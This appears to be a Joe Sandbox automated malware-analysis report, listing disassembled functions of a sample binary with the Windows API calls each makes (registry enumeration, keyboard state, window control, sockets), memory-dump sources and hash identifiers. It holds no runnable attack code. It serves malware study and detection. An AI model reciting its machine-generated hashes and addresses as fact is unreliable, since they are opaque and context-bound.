                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2027346449-0
                                                                                                                                                                                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                                                                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                                                                                                                Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                • GetMenu.USER32 ref: 0047A703
                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                                                                                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                                                                                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3257027151-0
                                                                                                                                                                                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                                                                                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                                                                                                                Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastselect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 215497628-0
                                                                                                                                                                                                                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                                                                                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                                                                                                                Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0044443B
                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                                                                                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                                                                                                                Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00444633
                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                                                                                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                                                                                                                Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                                                                                                                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2354583917-0
                                                                                                                                                                                                                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                                                                                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                                                                                                                Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                                                                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                                                                                                Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 896007046-0
                                                                                                                                                                                                                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                                                                                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                                                                                                                Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                                                                                                • GetFocus.USER32 ref: 00448ACF
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3429747543-0
                                                                                                                                                                                                                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                                                                                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                                                                                                                Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                                                                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                                                                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                                                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                                                                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3300667738-0
                                                                                                                                                                                                                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                                                                                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                                                                                                                Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                • String ID: %lu$\VH
                                                                                                                                                                                                                • API String ID: 3164766367-2432546070
                                                                                                                                                                                                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                                                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
